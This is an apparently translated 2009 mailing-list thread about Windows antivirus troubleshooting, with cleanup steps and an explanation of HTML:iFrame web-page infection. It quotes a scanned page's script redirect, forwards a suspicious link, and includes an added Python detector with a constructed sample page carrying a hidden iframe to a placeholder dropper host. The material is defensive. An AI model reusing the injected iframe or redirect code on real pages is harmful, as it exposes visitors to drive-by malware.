Hi Uskasin,
Do you still have the source file that was infected by the virus?
If you still have it, you could submit it to virusscan.jotti.org to scan
that file.
Then please follow the steps below:
Step 1: Windows Disk Cleanup Utility ============
1 Press Windows Key + R
2 Type in: cleanmgr
3 Put a check beside: Temporary Internet Files and Temporary Files.
Optionally, you may check other options too
4 Click OK
Step 2: avast! Boot Time Scan ============
1 Double click the avast! antivirus desktop icon and wait for the memory test to
complete
2 The avast! GUI will appear. Right click anywhere on avast!'s window and select
Schedule Boot Time Scan...
3 Click Advanced options and select Move infected file to Chest on the first
dropdown list and leave the other one as it was. Click Schedule
4 You will be asked for a system restart. Click Yes to do it now or No to let
avast wait for you to manually restart your PC
NOTE: Optionally, you may enable scanning of archive files. If it
is enabled, scanning would be more thorough but would take more time
Step 3: Malwarebytes Antimalware (MBAM) ============
1 Download Malwarebytes' Antimalware here
2 Proceed to installing MBAM after downloading
3 On the last dialog box, do not forget to leave Update Malwarebytes'
Antimalware and Run Malwarebytes' Antimalware checked
4 The Malwarebytes' Antimalware GUI will appear; from there select Perform Quick
Scan and click Scan
5 When the scan is completed, click Show Results
6 Click Remove Selected; a Notepad file will then appear.
7 On the Notepad window, click File > Save As and save it on your desktop.
You may now close MBAM.
Step 4: Hijack This (HJT) ============
1 Download Trend Micro Hijack This here
2 Install HJT in C:\Program Files\Trend Micro\HijackThis (the location is
already displayed by default). Click Install
3 The HJT window will appear. Click Do a system scan and save a logfile. A
Notepad file will pop up once the scan is completed
4 Click on the Notepad window and click File > Save As and save the file on
your desktop
5 Go back here to your topic and start a reply. On the Reply window, click
Additional Options
6 Attach the two .txt files that we created and saved on your desktop (click
"more attachments" to have more slots for attaching files), or if you understand
how to use HijackThis please go to http://hijackthis.de
NOTE: Do not have HJT fix anything yet.
Download avast antivirus at: http://www.avast.com/eng/download-avast-home.html
Thanks and Regards,
Yanto
________________________________
From: Uskasin <[email protected]>
To: [email protected]
Sent: Monday, November 16, 2009 9:56:08
Subject: [BinusNet] ANSAV - NOD - PCMAV
What a coincidence that AV is being discussed..
Last week I installed ANSAV on my PC..
Just for fun I wanted to change the date/time by double-clicking in the bottom
right corner, and suddenly a message appeared: THREAT FOUND.
Threat name: Honey.romantic
Object location: c:\windows\system32\rundl32.exe
Link: *ttp://s520.photobucket.com/albums/w325/uskasin/?action=view&current=av.jpg
(replace the asterisk with "H"...)
1. ANSAV could not delete that file.
2. When I looked for the file in that location, I could not find that
rundl32.exe file...
3. Besides ANSAV, I use the NOD32 AV, ESET v4; however NOD
did not find that threat... why is that?
4. So my situation is that I cannot edit the date.
5. Then I uninstalled ANSAV and replaced it with PCMAV... the result: that threat
was not found and I could edit the date/time settings.
Why is that?
Why is that threat only detected by ANSAV as a threat...
Uskasin
PT. BORAL PIPE & PRECAST INDONESIA
GRAHA MOBISEL 3RD Fl
Jl. Buncit Raya no. 139
Jakarta Selatan
www.boral.au
_____
From: binus...@yahoogroups.com [mailto:binus...@yahoogroups.com] On Behalf Of
Aay Cosmas
Sent: Monday, 16 November 2009 9:11 AM
To: binus...@yahoogroups.com
Subject: Re: [BinusNet] (unknown)
Yanto Chiang, thank you for the information.
In the end I went with Smadav.
But strangely, after I used Smadav, the Excel and Vypress software could not be
used.
Ok. Thanks.
--- On Wed, 11/11/09, yanto chiang <yanto_chi...@yahoo.com> wrote:
From: yanto chiang <yanto_chi...@yahoo.com>
Subject: Re: [BinusNet] (unknown)
To: binus...@yahoogroups.com
Date: Wednesday, November 11, 2009, 1:15 PM
HI Aay,
Based on a reference from avast antivirus, this web page has been infected
by HTML:i-frame, where the script on the HTML web page has been injected with
commands; one example is as follows:
2.1 - Web page infection
Among the new features is the ability to infect Web pages on the
local machine. Whenever the file infector has access to a file on
the hard drive, it checks whether the file is EXE, SCR, HTM, PHP, or
ASP, and then acts accordingly. For the PE files, the code discussed
above is used for the infection. For HTML pages, the virus actually
injects an iframe at the very end of the page:
NOTE: Just before the actual iframe code, we can see a string used
in the virus. This isn't added to Web pages, but to the hosts file.
Since the machine is already infected, the virus author doesn't want
the machine to be infected again, and therefore blocks access to the
malicious page with the hosts file modification.
(Source: http://securitylabs.websense.com/content/Blogs/3300.aspx)
Meanwhile, our scan found:
Source code of submitted URL:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Send big files the easy way. Files too large for email attachments? No problem!</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://hisoftdream.com");
//-->
</script>
<noscript>
</noscript>
</head>
<body>
Click here to download file
</body>
</html>
Source: http://jutaky.no-ip.org/index.php?option=com_content&task=view&id=19&Itemid=32
HTML:iFrame itself is a kind of trojan in which a hacker performs an injection
either through a web page or through email, and when the victim opens or clicks
that website, the injected file is automatically installed on the victim's
PC/notebook.
So please keep being careful in your activities on the internet.
Protect yourself with an antivirus, anti-rootkit or anti-malware tool that is
truly reliable.
The kinds of iframe can be read at:
http://www.avast.com/eng/search.php?searchFor=iframe&fnc=search&lang=ENG&x=0&y=0
Thanks and Regards,
Yanto
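The message above quotes two traces of the infector (an iframe appended after the end of a local web page, and a hosts-file line the virus adds so the machine does not fetch the malicious page again) and shows a scanned page whose only content is a script redirect. These can be checked for offline with a small script. What follows is an added example written for this page, not code from the thread, from avast or from Websense; the sample pages, the hosts-file lines and every hostname in them are constructed placeholders, not real indicators.

```python
"""Added example (not from the thread): detect the traces described above,
an <iframe> appended after </html> of a local page, hidden iframes, a
script-only redirect like the one in the scanned page, and extra hosts-file
entries.  All sample pages and hostnames below are constructed placeholders."""
import re

IFRAME_TAG_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# width/height of 0 or CSS hiding: the iframe is not meant to be seen
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# location = "...", location.href = "...", location.replace("...")
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*(?:=|\.replace\s*\()\s*['\"]([^'\"]+)",
    re.I)


def _iframes(fragment):
    """Yield (src, hidden) for every <iframe> tag in the fragment."""
    for m in IFRAME_TAG_RE.finditer(fragment):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        yield (src.group(1) if src else "", bool(HIDDEN_RE.search(attrs)))


def scan_html(page):
    """Return the suspicious constructs found in one HTML/PHP/ASP file."""
    end = page.lower().rfind("</html>")
    # Anything after the last </html> is not part of the authored page;
    # the infector described above appends its iframe exactly there.
    tail = page[end + len("</html>"):] if end != -1 else ""
    return {
        "trailing_iframes": [src for src, _ in _iframes(tail)],
        "hidden_iframes": [src for src, hidden in _iframes(page) if hidden],
        "redirects": REDIRECT_RE.findall(page),
    }


DEFAULT_HOSTS = {("127.0.0.1", "localhost"), ("::1", "localhost")}


def suspicious_hosts_entries(hosts_text):
    """Return (ip, name) pairs in a hosts file other than the localhost defaults.
    Malware that blocks its own download site adds lines here."""
    found = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if (ip, name.lower()) not in DEFAULT_HOSTS:
                found.append((ip, name))
    return found


# --- constructed samples (placeholder hostnames, not real indicators) ---
INFECTED_PAGE = (
    "<html><head><title>Intranet</title></head>\n"
    "<body>Welcome</body></html>\n"
    '<iframe src="http://dropper.example/in.php" width=0 height=0></iframe>\n'
)
REDIRECT_PAGE = (
    '<html><head><script language="JavaScript1.1" type="text/javascript">\n'
    '<!--\nlocation.replace("http://redirect-target.example");\n//-->\n'
    "</script></head><body>Click here to download file</body></html>\n"
)
CLEAN_PAGE = '<html><body><iframe src="/map" width=600 height=400></iframe></body></html>\n'
HOSTS_FILE = """# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
127.0.0.1       dropper.example   # added by the infector so the page is not fetched twice
"""

if __name__ == "__main__":
    for name, page in [("infected", INFECTED_PAGE), ("redirect", REDIRECT_PAGE),
                       ("clean", CLEAN_PAGE)]:
        print(name, scan_html(page))
    print("hosts", suspicious_hosts_entries(HOSTS_FILE))
```

To use it on a real machine, read each .htm/.php/.asp file from the web root into scan_html() and the hosts file (C:\Windows\System32\drivers\etc\hosts on Windows) into suspicious_hosts_entries(); a redirect or a hidden iframe on its own is not proof of infection, but an iframe after the closing </html> or a hosts entry for a site the owner never added is worth pulling the file for a scan.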
________________________________
From: Aay Cosmas <aay_intermilan@yahoo.com>
To: binus...@yahoogroups.com
Sent: Tuesday, November 10, 2009 10:33:51
Subject: Re: [BinusNet] (unknown)
Is this a virus?
What about those who have already clicked the link?
How do you deal with this virus?
Thanks
--- On Mon, 11/9/09, HILARIUS JANUARFIAN <hillbi...@yahoo.com> wrote:
From: HILARIUS JANUARFIAN <hillbi...@yahoo.com>
Subject: [BinusNet] (unknown)
To: val_hendri@yahoo.com, thomas_...@yahoo.com, aidah...@yahoo.com,
bpkm_...@yahoogroups.com, ka...@realta.net, beloved_niken@yahoo.com,
tunj...@ftr.co.id, andr...@sentral-sistem.com, Ita_godilove@yahoo.com,
TemuKeluarga@yahoogroups.com, binus...@yahoogroups.com
Date: Monday, November 9, 2009, 11:17 AM
http://taquarigas.com.br/swCgi9csY4.html
[Non-text portions of this message have been removed]
New Email addresses available on Yahoo!
Get the Email name you've always wanted on the new @ymail and @rocketmail.
Hurry before someone else does!
http://mail.promotions.yahoo.com/newdomains/aa/
Internal Virus Database is out-of-date.
Checked by AVG.
Version: 7.5.560 / Virus Database: 270.5.12/1599 - Release Date: 7/08/2008 8:49
PM